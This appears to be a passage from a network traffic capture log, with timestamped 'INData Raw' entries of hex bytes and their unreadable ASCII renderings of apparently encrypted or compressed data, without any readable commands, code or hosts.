                                                                              2023-10-26 07:45:59 UTC2187INData Raw: a2 f1 b3 65 f3 01 bf 57 bf f2 bd 17 19 6d aa 61 73 e2 8e 49 8f b7 2a 14 94 72 c7 b7 82 86 9f 77 6b 8b 7a e5 c0 86 bd ec 64 62 e7 e8 ff 4b b9 40 05 89 aa 5d ed 81 bd a8 a8 03 f9 57 d4 c1 e8 5b d9 01 16 3a 62 6d 9b 70 14 63 47 50 b1 c7 d3 c7 f4 04 85 18 80 62 13 2e 94 71 83 3a b2 4b a7 45 54 e2 c9 22 e5 d7 f8 a1 dc 01 f4 ea 11 3f e1 ab 4d 66 87 e2 d9 8c 2e b8 fb 21 90 0a 34 9c ea 42 d3 0a 8b 38 74 bb 44 1c 08 e7 55 0e 52 a2 43 77 14 fc 29 eb dc b4 79 3a 74 d2 a6 57 6c 76 c2 58 af 61 7a 60 82 fb ce 5d bf d7 e5 65 54 fc 70 39 97 42 dc e7 12 82 b2 38 b4 d1 00 71 b4 82 f1 f7 f1 81 3a 77 32 c2 4a 58 6b 7d e9 3f 78 05 86 17 db ef f9 37 36 b7 a2 f7 74 22 68 54 65 e7 ea 17 71 62 79 05 2d e2 c1 db d4 78 00 fa a8 b1 93 61 74 6d 08 fc ad 9d 07 e6 e3 0d 39 d0 df fc f2
                                                                              Data Ascii: eWmasI*rwkzdbK@]W[:bmpcGPb.q:KET"?Mf.!4B8tDURCw)y:tWlvXaz`]eTp9B8q:w2JXk}?x76t"hTeqby-xatm9
                                                                              2023-10-26 07:45:59 UTC2203INData Raw: db 21 c5 63 54 f0 ad 50 a7 b8 59 78 92 df 2a 2f f0 78 56 08 34 a2 d7 4b d1 86 4b dc 46 a2 0d fd 94 94 2e f8 5c 42 04 38 0f 77 c6 b7 f4 ba 81 2f 7f 3b 66 5c 53 fd 0a 65 a8 aa f4 25 a9 da a8 f7 51 87 28 c1 c5 e5 0a aa 8a 94 aa 9c 34 1e 54 a5 f8 4e 3c a6 f1 21 78 54 97 fb ca 08 8a 8f 82 7c 74 cf 9e 37 0f 08 da 57 8f 54 10 b1 b4 3b 21 1c 94 52 b1 6c b9 92 b9 a3 c7 71 15 1c 88 b9 f4 37 5d d6 aa f7 94 f9 fc 1e 4e 8b 99 d7 43 72 cc ec 5d 98 2a 0e 82 26 cb d2 24 e2 fd 18 7d f6 6a 63 8d 06 da d7 cb 65 91 18 ab a1 d7 21 71 a2 ea 2c c2 9f d2 d8 c0 4a b4 3a 0a 42 0a 21 e3 00 ea e7 dc 90 3e ab c9 71 09 01 60 22 f0 42 9a b9 11 78 ce 01 a9 e9 3c b0 d9 d0 12 bb 0b 31 72 c6 ca 2b a2 65 40 45 a4 4d 21 90 b4 e6 fc 13 33 62 93 d6 5c c1 12 5e c2 03 8b 31 28 42 13 f8 5b 7e 4a
                                                                              Data Ascii: !cTPYx*/xV4KKF.\B8w/;f\Se%Q(4TN<!xT|t7WT;!Rlq7]NCr]*&$}jce!q,J:B!>q`"Bx<1r+e@EM!3b\^1(B[~J
                                                                              2023-10-26 07:45:59 UTC2219INData Raw: 41 ad 76 dc 14 b0 69 e5 44 7d 9c 7b 73 df 00 7c 8a e2 2a da 6c 97 b0 55 80 02 f5 5b 0b 7a 69 7a 75 6d 2f 23 a3 61 e9 d2 62 fd aa 0e e4 6e f7 5e f3 36 77 81 d8 e1 b7 4d 04 22 06 72 4a d2 16 ab 50 64 c7 6b ad eb bb 59 34 4d 9b cd b4 07 06 7d 0a a2 84 ac 54 3c a7 4b 94 6b fa 7e 8e 2a cb d8 0e af 67 38 f0 62 35 66 a8 23 14 4b 9d 08 8b bd d9 61 ca 08 bc 2c f3 ee b8 41 ad 45 e3 6d d6 88 01 47 ef fd 74 65 06 5f 80 4b f2 50 9d 32 4b 89 e3 84 e9 39 0f 0d a5 b7 2b ad f2 78 b1 0d e8 6c 51 8d ca 69 94 e5 fe 3a 1c 8e c4 f7 b6 0c 84 f8 54 cb fb e8 f4 7e d5 66 5d 43 11 29 6d 55 1b 6c 6b 3f 8b 73 f5 b9 01 24 b4 c1 eb 4c b8 90 ea ac 92 9c fe ee a3 f3 a4 66 18 b3 0b 39 c6 01 16 25 60 e2 ef 24 08 36 01 46 14 63 ca 00 8a 88 43 b0 d1 e0 ef 5e ba 7e cc 2d b4 61 c4 5c 5c 8e b7
                                                                              Data Ascii: AviD}{s|*lU[zizum/#abn^6wM"rJPdkY4M}T<Kk~*g8b5f#Ka,AEmGte_KP2K9+xlQi:T~f]C)mUlk?s$Lf9%`$6FcC^~-a\\
                                                                              2023-10-26 07:45:59 UTC2235INData Raw: 4f d5 d0 78 f3 e4 de 0f 73 0a e4 17 3c f3 f0 b5 10 fb 49 84 cd db 89 58 f4 5a aa ea f2 61 96 1b e4 ca 59 e3 e2 ce f0 73 7e 49 03 98 f2 02 79 fd d6 c1 c6 2e ab 4a 54 ec 80 22 e2 e6 20 62 6d 84 cc cc 82 98 15 61 99 b7 c3 c2 ed 95 33 a2 f7 54 5b 84 3a a7 f9 6a b4 d0 33 a1 22 d8 de da 2f 9f 45 68 4a 42 63 e2 42 e8 f4 5a cb 28 08 96 78 56 41 47 1c d8 4b d8 08 50 42 ed 8a 7c 06 2e 62 d3 c4 f5 6a 6c a6 19 1f 58 99 22 0b 7f 66 e6 b3 2d 59 59 ca e5 e5 e1 23 9a 25 15 b2 cc cb 1b cb 69 00 13 6b d8 46 22 69 8c 75 f7 d0 7e 08 12 0d 3b fa 72 7a 38 fb 11 60 91 d4 33 8b 5e 07 13 0b 79 1b d8 61 79 d2 8c e8 b7 49 75 60 3b 14 f3 18 f7 3f ca 10 98 54 40 0f 51 23 82 ff 89 a6 69 c9 b7 43 c1 a7 57 02 3d b0 70 74 81 2b fa 7a 65 aa 5b b4 61 0e b0 1b 47 fc ef e2 da b6 10 85 a2 0a
                                                                              Data Ascii: Oxs<IXZaYs~Iy.JT" bma3T[:j3"/EhJBcBZ(xVAGKPB|.bjlX"f-YY#%ikF"iu~;rz8`3^yayIu`;?T@Q#iCW=pt+ze[aG
                                                                              2023-10-26 07:45:59 UTC2251INData Raw: 69 69 b5 21 64 22 71 64 55 4d 01 a7 f3 61 8e 00 bf d1 89 38 94 70 01 a0 3b 8e 9d f9 87 ad 05 38 14 78 55 a6 b5 61 fd 90 8c da c3 3a 00 cb 6a 9f 48 9e 92 98 74 a4 86 08 e5 9b 0a 2b cb 8e 51 f7 b0 81 0d bf 92 e2 ea 5b 98 da 91 8f 2e b4 d2 b5 54 b6 69 05 d5 05 4b 8c de 4a 90 c5 83 e2 13 e8 b4 c2 ed 0c 64 ce d2 62 83 7b 0a 38 7b 2b ef 66 f9 c7 ea b7 8f 25 d0 1e 94 22 5b ea bf 7d a6 dd 94 63 f2 4c ac c2 16 41 15 42 ab 32 f4 f7 3d 8d a7 9c b9 67 56 d9 1a d8 7f 2b cb 3e d4 61 f2 38 0f c3 8a 3b 34 5e 05 38 4a 63 f9 02 86 7f c0 e8 05 02 cb 25 f4 8f 3b 16 49 d7 c3 1e 5a f7 9a d7 a8 65 92 5d 76 32 0b 5c 64 cb a9 56 15 e2 9a 59 7e a4 00 20 0c d7 a6 12 73 73 aa da 50 b7 c2 89 27 e1 76 78 b4 ab 7d 8b c9 da ea 16 39 7a ce 29 a0 04 47 7a 8b c2 4e ea 4d f2 c5 79 b4 93 8f
                                                                              Data Ascii: ii!d"qdUMa8p;8xUa:jHt+Q[.TiKJdb{8{+f%"[}cLAB2=gV+>a8;4^8Jc%;IZe]v2\dVY~ ssP'vx}9z)GzNMy
                                                                              2023-10-26 07:45:59 UTC2267INData Raw: f4 05 7b 12 be 32 e9 5b bf 87 e7 1a 34 67 f9 5a 0c e2 c5 4b 8c d3 15 90 d8 e2 4a a0 15 93 1a af 0f 9d 01 d0 f4 e3 3e 5e b3 b8 9e 97 ad 53 59 a3 ea 8b 55 a8 28 7a ff 7a 4f 67 b6 38 52 b4 bd 99 06 72 51 79 03 d3 1e d4 bf c8 0a f8 05 5f 0f 60 55 59 13 7c 54 80 bb 09 14 a3 a5 79 34 ac 11 2d a2 01 ee 8e 07 3c f7 6b 44 02 f9 36 11 02 6b 3f f0 41 ba a8 12 a2 8f 78 f4 89 71 81 8d cb 41 58 74 83 ee 6d dd 31 ff 12 4a 07 cb c5 f2 8a 00 af 11 22 0e 58 89 88 17 6e 9a 33 2b 7e 42 d6 dc 6b 05 3c 6b d8 79 90 45 2e 65 b0 48 90 f4 b9 e7 98 93 61 0f a1 f6 85 fe 9a 13 62 37 8d 73 3d d3 4f 4e 7e bc f0 3e d6 c0 59 f2 82 bf 5a 4b 79 58 a6 94 54 59 70 d4 0f 01 87 1e 8f aa 5b 48 7e 72 7a 45 60 fb 18 fe 58 f7 f8 74 7b c7 9f 55 89 de fe f8 7e 2a 76 6c 81 4d a5 17 bf 0a 18 49 b2 56
                                                                              Data Ascii: {2[4gZKJ>^SYU(zzOg8RrQy_`UY|Ty4-<kD6k?AxqAXtm1J"Xn3+~Bk<kyE.eHab7s=ON~>YZKyXTYp[H~rzE`Xt{U~*vlMIV
                                                                              2023-10-26 07:45:59 UTC2283INData Raw: d3 a2 6a f9 b2 04 d5 df 14 e2 1f 7c 6c eb 3c 00 b4 65 a9 db 01 b5 d0 fb b6 45 0b a2 de 96 cf 50 b3 81 3e ff e3 ac c0 9b f4 79 ea 3a 0e f0 43 83 79 df 00 62 a6 98 8e 61 58 5e ec ba 4a cf 5f 4b f3 a1 74 e9 43 c3 6e 32 10 a2 56 d8 74 c5 87 3e 19 60 11 ff 64 65 69 4d 82 8a cd 12 8c 02 ea 20 ff 3f ae f0 cd 8a 4a 7a b5 5c d0 8b cf 95 ea 77 d4 7b 4b 15 d6 8a ea 94 93 5f e1 01 ca 98 95 28 43 4a ba 97 c0 54 64 88 fb 3b ea 77 bb 60 b8 71 0a 6b 4a 6b f4 c6 47 25 d6 73 f1 94 9a 66 04 47 c4 e1 9f 2d 90 62 a0 d7 94 03 11 a8 19 da 0a 8e 63 59 9f a5 b3 e1 61 0f f6 8a ff da d4 90 3a ae b4 a1 95 0a 5d 68 63 b1 54 b4 c4 89 14 42 eb da 67 43 eb c5 f0 21 4b 13 74 7b 76 70 12 e5 b3 89 b0 fb 48 18 17 78 43 58 14 db 5e de 96 90 74 91 d4 17 08 9b e6 7c 09 6c 32 95 a8 65 13 5e dc
                                                                              Data Ascii: j|l<eEP>y:CybaX^J_KtCn2Vt>`deiM ?Jz\w{K_(CJTd;w`qkJkG%sfG-bcYa:]hcTBgC!Kt{vpHxCX^t|l2e^
                                                                              2023-10-26 07:45:59 UTC2299INData Raw: 3b 3a 4b b3 d9 31 eb 38 ab 49 03 e8 e1 bd c5 6b af 01 e4 e6 45 69 ea 78 9b 9d cc 57 84 9e ef d3 68 32 9a 46 71 a2 fd 99 4c f6 0e aa f2 56 84 18 fe c8 f8 24 d3 61 45 cb f3 21 41 2d 1b 3d c9 3b da fa 0a 79 1a 83 6c 22 fd ae 09 42 14 e2 15 a3 d4 c1 f1 47 c4 e1 f6 1c 26 a2 b7 e5 42 02 0b 12 f5 a2 ab 23 d5 74 2a 58 3d eb 11 97 f2 7e a2 d7 fa 35 6d 7f ac 21 a2 2e f2 b1 09 5c 4a 02 c5 c9 54 c2 e8 1b 38 bf 1c 98 af b7 18 78 bb 62 14 99 c6 7c 8a 98 60 e3 8b 38 34 7c aa f5 e2 c5 8e 41 98 02 6f 71 74 15 4b 0c 42 8c ea 8e 66 35 d3 7b 76 fd 9a 73 e5 0b f3 d7 d5 58 7b d0 94 26 2a 42 fb 7f 6a d8 6a db 9a 95 f3 f1 eb 4c 0c be 18 d8 04 82 94 76 02 a5 78 61 d4 f5 ed 41 03 9a b4 fa 57 c2 f1 62 21 b7 17 f8 0e ea e8 d2 6b f5 1e a6 d4 e3 fc 20 50 b0 2a 89 c8 7f 06 f4 57 e4 4c
                                                                              Data Ascii: ;:K18IkEixWh2FqLV$aE!A-=;yl"BG&B#t*X=~5m!.\JT8xb|`84|AoqtKBf5{vsX{&*BjjLvxaAWb!k P*WL
                                                                              2023-10-26 07:45:59 UTC2315INData Raw: e1 da 96 7e 40 e2 fe 07 94 64 3f 6b 27 84 43 d7 c7 d9 6a 6f 6a f2 60 32 4c 17 ab 8f d4 52 1f 26 f3 85 17 53 47 85 35 48 34 f7 73 79 e1 ac 8d 08 5a a2 ea b6 7b 0b 62 ea 72 bf 55 18 dd f3 89 d8 04 22 2a 05 eb 21 7e 70 40 87 87 02 3e 62 d7 05 74 c2 c7 9c 72 b2 d0 79 db 77 53 3d 86 c1 6a 58 6a c2 8b 17 f2 bc 67 2a ff 31 b0 37 b4 8d 96 e5 b4 61 c4 10 1e 46 4f f8 5b bc 67 7b e9 7d fb 4b a8 8c 30 1d b3 41 f9 58 34 e2 29 aa fe 07 07 00 7e 54 10 af c5 01 4b 5d ea cc f9 ab ee 62 6a 1d 07 ca 2d 22 36 b9 44 b8 28 52 e7 fe 92 eb 7f 79 14 cf 0c 2b da 85 2a a2 24 02 8d 5a 4c a0 67 dc 74 65 ec 28 1b 4d 83 37 b4 70 f9 03 06 9c e9 62 42 f6 63 c6 71 02 bf 22 92 b8 b2 b7 63 ad c8 ec b4 d9 25 3e 74 9c 02 30 94 18 a3 33 6a ee a8 cb 54 d3 74 37 b2 b8 72 97 63 29 4a 0b 63 71 2e
                                                                              Data Ascii: ~@d?k'Cjoj`2LR&SG5H4syZ{brU"*!~p@>btrywS=jXjg*17aFO[g{}K0AX4)~TK]bj-"6D(Ry+*$ZLgte(M7pbBcq"c%>t03jTt7rc)Jcq.
                                                                              2023-10-26 07:45:59 UTC2331INData Raw: 03 3a b9 0c a0 c1 ae 23 f5 2c 70 25 3f c2 4a 59 1e 54 6a db 6e 51 2c b8 c8 ed 90 54 f7 a0 aa 53 6d 6c 55 e9 54 62 0a 1a 6c c1 37 93 a9 cc 39 58 3e be 24 67 7b 0a ee 1a 6f 42 c5 d2 f0 41 47 5f 96 e2 2a ea 60 c3 0d 74 54 9e 6a 78 16 11 c4 19 1b 30 f5 57 5c 77 7d ff 7e 76 28 1b be 6c e7 f7 1b 1a 0e f8 c7 11 ab 41 97 02 8b 39 f5 73 f3 23 5c 18 fe b7 95 b0 8a 34 24 6a 34 2c bd 86 6a 78 7f 7c 4e 08 ca b2 15 95 d1 6a 2a 38 34 bf e6 77 02 ab cd a6 ad bd c1 7e a9 ab 28 58 2b 9a 6a 26 16 ba c7 f7 1a 01 84 e8 f4 82 46 9c c5 e0 9f d7 e4 8c 07 6f 32 05 3b 83 38 7e 2f fc f4 a3 94 18 42 20 d7 28 dc e8 d3 ef cf 6a 5a 98 6c 02 0a 40 e6 e6 c5 96 2f be ce b0 47 82 af 70 f4 f2 a3 1a 94 e4 e6 4b 94 44 d0 47 fd 43 98 98 ff 86 a5 84 14 ea 4f 20 7c d9 df 56 b4 e1 85 57 fc 0e 07
                                                                              Data Ascii: :#,p%?JYTjnQ,TSmlUTbl79X>$g{oBAG_*`tTjx0W\w}~v(lA9s#\4$j4,jx|Nj*84w~(X+j&Fo2;8~/B (jZl@/GpKDGCO |VW
                                                                              2023-10-26 07:45:59 UTC2347INData Raw: 28 b4 fa 9b 00 62 9b 2b 6d ce 11 58 f6 6b 5d ce 34 c6 b5 6c 9a 67 0a 8e d8 61 6a 60 1b 4e b3 2a 5f 37 ff f7 b2 b3 07 c8 b2 4a b1 2c 6b 22 be 97 90 df 8a aa 44 98 ff 2b 1d 9d d9 25 34 26 f4 6f 01 4e 46 e2 f0 01 b0 e6 86 35 eb 24 e4 5f 8d 0c f8 67 d4 52 4e cf 16 01 af 21 1c 70 cf 9e a3 08 d5 61 bb 80 5b 86 50 65 0a 5a 09 a2 c1 e1 fc 30 0f d2 39 cd e4 61 d3 78 b3 9b 48 51 fb 80 a3 9d f4 a6 fe c1 e3 89 f6 23 7b d9 e6 66 ca 15 6f b7 da e0 7c d7 24 22 70 1d f5 a9 a2 f7 e1 78 db a5 e1 21 90 05 f4 1b fd 2f ce a3 d7 5e 78 0c 77 78 bf 61 2e 0f 66 8b b7 15 6a 83 d7 6b 55 85 94 86 d4 0e 1a f8 7c 7b d8 62 74 9f b1 5a 4b 69 b2 40 74 87 e0 0e 1e a2 f4 12 ce f7 08 98 ad 36 52 18 70 ba 0a 0f 55 6d 6a fb f1 db 15 f9 91 39 29 d9 d4 41 95 f1 f9 c5 c9 30 bf 21 ab 5a 9a ff 22
                                                                              Data Ascii: (b+mXk]4lgaj`N*_7J,k"D+%4&oNF5$_gRN!pa[PeZ09axHQ#{fo|$"px!/^xwxa.fjkU|{btZKi@t6RpUmj9)A0!Z"
                                                                              2023-10-26 07:45:59 UTC2363INData Raw: 8d cc b0 2a 74 71 e7 6e 5a 46 42 f0 74 cc cb 53 3f 62 61 11 05 b4 7e 57 a7 0f d8 2c c0 71 e5 17 31 c0 c2 74 0c ea 76 d4 f0 ac 64 b9 14 aa e7 af e6 cc ea 80 cc 60 c6 7c 88 63 04 e0 a1 68 90 64 d7 2f 8c cc b4 e8 2b 38 0a be 01 93 a6 01 eb d7 ef fa e4 53 cb 61 8c e0 09 c0 32 df f1 a8 f3 69 5c f7 b8 37 50 e4 a1 67 58 66 72 4b e5 f7 0d e3 34 62 cd 32 d4 53 f6 15 06 62 cd 61 42 de cc 7a f0 d6 81 5b bd 04 85 aa d4 6c fd 37 8f e7 2a d8 4a 6c c8 69 34 6b 7d 6f f8 e1 66 af f4 e6 6c 5f 4b 03 70 15 0f e1 6a b8 83 90 87 09 93 22 e7 67 d1 b6 bf e6 f9 71 9f dd f1 31 b9 5c 81 c6 a6 d7 e7 5d c2 85 d4 55 e8 e4 8b 3e 94 f8 67 c5 35 d0 1b 6d cf df 73 16 8b 98 3f ae 8c b8 f2 c1 be 1c cb 4c 30 59 c7 12 93 58 55 07 86 38 f4 7d 47 73 8b 0b 60 18 f6 41 6c 0c c7 dc ea 7d 63 bd 0c
                                                                              Data Ascii: *tqnZFBtS?ba~W,q1tvd`|chd/+8Sa2i\7PgXfrK4b2SbaBz[l7*Jli4k}ofl_Kpj"gq1\]U>g5ms?L0YXU8}Gs`Al}c
                                                                              2023-10-26 07:45:59 UTC2379INData Raw: eb 8c 89 38 df 63 51 69 fa 58 a7 56 e4 09 0e 4f ef d1 0a 37 41 fe 6a 7c 45 90 9c 86 63 62 e5 3e bb e1 20 7c eb 83 40 ac d4 a1 d2 b8 8f 5e ea 37 7f 66 39 07 d1 6f ca 6e 6e 8b 69 28 aa 35 a5 93 88 e2 e9 8e c8 bf 34 e8 44 f8 4e 78 76 db f3 34 45 38 9d 96 87 aa ea be 8c 62 49 68 1d 9c 90 af 1b 50 ea 7e c4 a0 7e 26 46 27 6b f8 cd ae 8e 75 dc 38 eb da 62 4c 10 e8 08 9e 88 7c 3e 0e c5 94 2f 4d 0b 78 bd 86 33 68 96 e8 2a 23 24 c9 82 e4 50 b8 a6 55 22 62 4b 63 23 6b f9 ad 97 8e ed 78 34 d8 0a 79 e9 7a 51 6c cb c2 6a ca 1f 22 87 06 e8 61 54 de de cb e9 4a dc 6e 44 00 0e a3 40 26 06 3b a6 13 f4 6a 5a 93 ca b6 c7 97 5c 96 8e 9d f4 f3 5e 6d 5f e7 0c c9 ec d3 aa 8a 36 6e bb df 74 e9 fa b3 c0 dc 7f c8 54 54 7f 79 f3 78 a5 dd d0 37 8c 2b 00 62 40 60 60 ac c5 ff 14 a2 90
                                                                              Data Ascii: 8cQiXVO7Aj|Ecb> |@^7f9onni(54DNxv4E8bIhP~~&F'ku8bL|>/Mx3h*#$PU"bKc#kx4yzQlj"aTJnD@&;jZ\^m_6ntTTyx7+b@``
                                                                              2023-10-26 07:45:59 UTC2395INData Raw: b4 0b e8 63 55 85 62 5a be f4 84 b9 ac 0f cb 7c cf 6b c2 69 5d f5 86 7a 54 f8 ee f1 1d 6c ca 57 f4 fb f7 99 15 b4 ff 78 56 63 c9 67 4e 65 97 51 3e e2 dc 7f cb 6c 2a ff d3 21 ca 57 d4 ed 7a b8 f3 81 c6 51 77 11 08 a8 4c e1 01 8b 46 81 61 7c 74 77 9c d6 2d e2 78 c4 c8 1d 0b f3 47 86 26 38 f4 07 06 93 03 f1 68 2f 4d e1 aa f7 d9 a3 b6 d8 34 ae b1 2f 6b 56 b2 87 91 70 e9 46 a1 6a bc 2d 14 22 0a 22 f9 c0 ee 5e 4b 77 c6 b7 23 42 f5 33 23 3d af d7 72 fd 9d 26 24 62 cd 65 74 69 84 7a 54 46 95 31 c5 25 2b ed c3 21 69 19 0c 33 f4 38 56 32 2a 49 d6 f9 2a bc f9 bb 93 fc d4 0d cb 5d d1 3b ec 09 1c 47 5e 18 f4 dc 82 02 05 3a f9 7d 71 7a 41 6c 66 e2 ea 6d ac 84 27 1e 19 23 b8 01 54 87 0d a0 27 23 ab dc 04 8b ff 75 78 e0 7a 00 74 f0 45 18 af 10 63 78 50 cc ea 31 15 9c f5
                                                                              Data Ascii: cUbZ|ki]zTlWxVcgNeQ>l*!WzQwLFa|tw-xG&8h/M4/kVpFj-""^Kw#B3#=r&$betizTF1%+!i38V2*I*];G^:}qzAlfm'#T'#uxztEcxP1
                                                                              2023-10-26 07:45:59 UTC2411INData Raw: 95 a4 eb 70 a4 8c 3f fd 94 5d 6a d8 7f 90 49 87 12 cb 0c 71 fc b5 e9 57 72 77 81 64 d4 fa aa f7 8c 73 62 8a 9b 7d 2d d6 54 82 f4 66 cd 58 e8 a9 c0 7f 74 e1 51 80 6a 60 26 c3 ea 76 6c 7f 20 f5 6b d6 6b 9a 63 62 74 75 0f 2c d3 17 db bc 4e 28 52 3b 5b d8 e1 c2 fe 9f f4 bb 4e ee d6 77 d2 77 86 8c 6d ed 11 ac 92 5e e2 94 8a 80 55 62 6a 60 72 4e 88 7d e1 8a 4a f8 22 62 64 78 80 70 98 a7 f2 d5 ec 2f 12 fa 57 38 54 03 e3 77 a4 4d 5c 84 d7 0a 60 19 f4 3d 7d 7a c9 3e 6e 7c 37 64 13 a3 12 b4 5e ef bf a1 48 1a 6d d7 2a 10 fd c5 a6 f3 f4 63 4d 66 d4 ee 78 a7 54 c2 c1 f9 f3 f1 01 a1 11 c0 66 e1 21 f2 0c 22 66 62 91 69 40 8d c2 f2 95 a4 e9 cf 17 47 bc 5e 72 bd 53 e0 47 02 06 30 46 2c 02 44 f4 53 99 0b 80 8d b9 ee f4 4a 6a 4c e7 e3 44 55 68 63 4f 01 cb 6e d4 b0 c8 85 8a
                                                                              Data Ascii: p?]jIqWrwdsb}-TfXtQj`&vl kkcbtu,N(R;[Nwwm^Ubj`rN}J"bdxp/W8TwM\`=}z>n|7d^Hm*cMfxTf!"fbi@G^rSG0F,DSJjLDUhcOn
                                                                              2023-10-26 07:45:59 UTC2427INData Raw: f3 f4 d8 ff ba fa 0b ad 28 5b c7 89 74 b1 17 50 b4 d2 0c a0 b4 01 f2 04 35 e4 0a 74 da a1 10 04 07 62 39 83 a0 64 6b 4b 14 4e 3d ca f4 77 ca 28 61 bf 04 a4 b0 87 4e 57 74 6e 65 2e b4 aa 3c 54 6c a2 0e 0a c6 01 ef 35 e3 90 f3 54 54 e7 fe ac 76 52 e9 23 04 36 05 2a 68 59 be 37 49 64 06 91 af 83 54 f7 a7 9d 0a 7c db fe 4c cd 72 fc 7a 78 18 9a ad 28 cc ab 83 79 94 c9 bd 96 45 8d 3f 1f 54 f6 d5 78 14 16 d1 18 10 62 63 78 c7 67 b6 69 c6 18 80 7d b8 aa 95 7f e9 cb 04 96 4d 9f 5a 5e 41 56 ce 77 c3 4c 61 18 f5 7b 61 60 a4 d2 8a a2 0f 7b c7 97 14 70 53 e7 5c a2 af f5 74 00 14 55 d4 40 39 f8 f4 d4 b8 84 b4 7a 37 19 38 7a 95 2b 3d 90 7d ff 2a 6c c1 13 74 67 c3 ca 7e 11 e9 77 83 d4 d2 23 f4 90 44 98 b4 a0 7b 7d d0 58 ff a9 e0 54 0a 77 14 0d 0f f1 6b 3c 43 78 c1 a1 ca
                                                                              Data Ascii: ([tP5tb9dkKN=w(aNWtne.<Tl5TTvR#6*hY7IdT|Lrzx(yE?Txbcxgi}MZ^AVwLa{a`{pS\tU@9z78z+=}*ltg~w#D{}XTwk<Cx
                                                                              2023-10-26 07:45:59 UTC2443INData Raw: 88 e2 ee 47 66 5f ce d6 88 a2 68 2d 30 b2 2a 04 51 7b e7 23 53 f2 5a 14 26 1c f6 ab b4 51 fe 7b 43 89 9a 79 95 e2 ca 0a d6 bf 72 25 94 63 07 06 06 e3 b1 2c f8 29 fd f6 ed f8 f7 a8 7a c8 bd 10 f3 fc 06 05 7f 91 25 d6 d4 c1 78 7c 09 37 03 07 66 fc 81 38 ba 50 6b 98 54 7c 6c 79 79 91 a5 de 01 ca 78 53 22 e2 d9 4c 5c 22 16 56 0b 8b 03 62 0d c6 f4 5d 9a 3b eb fb 11 72 44 df 14 7e 1b 5f d1 e2 ea ba f3 e5 ca f7 aa a9 62 d8 fb b5 81 68 a7 2f ab 8f bd e2 fe 6f 69 da ea fa 8c 0c 71 18 94 99 71 79 07 5c 67 30 f5 b8 e7 6b d4 f2 b3 f2 8a 14 6b 9c 48 22 0c 46 c8 6a 0f 2a c5 21 eb a4 05 62 40 df 09 9c 7c 57 7d df f3 23 11 07 61 d6 58 d4 f2 f7 b9 d3 69 78 14 cf a0 16 85 f0 a4 64 a5 01 6b d1 c0 b8 fd 1d 09 62 4a e2 1c 3b f8 ef bb d2 0d cf 75 2a eb f0 14 7e 3b 15 5d b9 7c
                                                                              Data Ascii: Gf_h-0*Q{#SZ&Q{Cyr%c,)z%x|7f8PkT|lyyxS"L\"Vb];rD~_bh/oiqqy\g0kkH"Fj*!b@|W}#aXixdkbJ;u*~;]|
                                                                              2023-10-26 07:45:59 UTC2459INData Raw: 46 1b 64 a8 94 65 4c 6c fc d8 7a 84 8c 05 dc f6 f3 f7 da a9 69 a5 62 1c 3c eb 61 71 fe 41 e2 61 54 62 e7 6b 74 a2 7b 73 07 95 71 1f fa 7b 4a f9 a8 8c d9 2d 3e 47 be 50 34 63 dc 5b 55 83 ec 99 cc 41 9b d7 91 86 05 99 32 59 98 84 d4 b3 2a 06 31 95 9f b7 84 82 bc 8e 62 19 98 94 14 24 61 58 c1 b8 1a 98 f0 ae c3 5f c2 c5 6a 65 7f 7c b2 77 d9 54 d0 10 37 bc d8 9e cc 01 83 d6 f4 33 d3 5f 44 0f b8 75 5c 9e c2 f7 09 b8 44 78 4d 9b ba 73 5d 3b 13 3b e2 a7 26 80 83 e2 14 94 14 6b 99 5a 49 1a 41 86 96 8f 49 c6 b8 21 03 ab 9a e0 7e fc 94 c2 e8 bd 6c 82 ea df 19 ad c2 85 cf b7 22 54 d3 56 11 78 e8 b6 0a a9 d5 7a e9 a9 8b c8 da 9f db 7c 26 2b cf 62 03 9d 9f cb e9 fd 4a 50 4b 78 31 6c 66 58 11 02 04 ff 86 76 53 e8 89 b9 a9 d7 16 7a aa 8b dd ea 8a 8b 51 0c f0 57 08 43 0b
                                                                              Data Ascii: FdeLlzib<aqAaTbkt{sq{J->GP4c[UA2Y*1b$aX_je|wT73_Du\DxMs];;&kZIAI!~l"TVxz|&+bJPKx1lfXvSzQWC
                                                                              2023-10-26 07:45:59 UTC2475INData Raw: f9 c1 bc f7 dd ba 2d d8 8a 25 0b 4a 9c ab 89 01 fb 11 14 02 7b 61 6a 7d 06 1d d7 e1 24 a2 a9 6e c6 37 f9 f7 c5 f0 09 89 ce ea a2 52 fa 94 ea de 4c 7c ff da 20 b0 96 18 e2 38 af 36 f4 73 2a 5d 01 e0 7a d4 7f aa 4a 8a b3 64 fd a9 10 ba 44 64 8d 9b 71 57 f5 e1 d7 90 d4 a9 8a 5c 8f 02 ce 12 5a 22 8b 28 9f 0b 7e 6f 94 ea ba 5c 2a bf 4b 98 ef a8 ad e4 86 f6 aa 0d 5d 3c 8b 23 a9 d9 b3 79 a8 80 6a ee 28 f0 d2 d7 8e 2b 58 18 f0 d7 f5 3e f4 bf dd 04 8c bc 60 78 f4 59 99 57 66 0d f9 4a 96 6d e7 d4 20 b9 b9 d7 7b 3f d9 c6 44 02 af 75 4a 5e 8f 48 02 94 78 7c 14 e5 66 a0 b4 65 37 19 04 38 69 98 53 9f 40 98 7d 42 4b 7c c2 54 68 d7 8e 44 0b fc a9 88 ca 22 3e bb e8 3e 43 b8 c0 97 7f 38 6b bf 47 2b 68 cb cc c2 e7 b7 53 be ce a6 c0 46 51 da 34 14 57 b8 de e3 9b 49 54 fc dc
                                                                              Data Ascii: -%J{aj}$n7RL| 86s*]zJdDdqW\Z"(~o\*K]<#yj(+X>`xYWfJm {?DuJ^Hx|fe78iS@}BK|ThD">>C8kG+hSFQ4WIT
                                                                              2023-10-26 07:45:59 UTC2491INData Raw: f0 45 78 b1 a8 97 90 3f f4 0d 33 63 9d d1 2a 6c a0 a0 7c d2 0a c2 ea 6b 55 0c 03 a8 1c bb 82 98 f3 5e bc 6a 52 71 c0 66 54 5b a1 18 0c 64 3a f8 13 a3 6a 94 a6 80 82 38 f9 8e 45 01 a5 10 0b d8 78 4f 55 37 48 d7 3b 8a b4 a1 12 68 88 fa ea 76 93 87 37 5b d4 7d 3d 57 66 c0 fa 0f fd 21 74 49 3c e1 40 d8 de 6f a7 55 49 54 ca 3b 34 73 ad b9 b4 f3 9d 13 74 22 6b dc 0c 4e 29 3a a7 13 ab 7c 01 ca 44 e1 33 8f 8a 67 06 6b 6a 49 1f a5 ca 97 6d 0d f9 f2 54 7e 4e f3 f4 da f7 9d dc 9b fc 93 56 87 a5 a8 48 e2 6b 26 18 f6 ab ae d9 bd 6a dd 46 62 da c6 14 44 ea 29 97 b5 c8 02 50 cc 00 9b 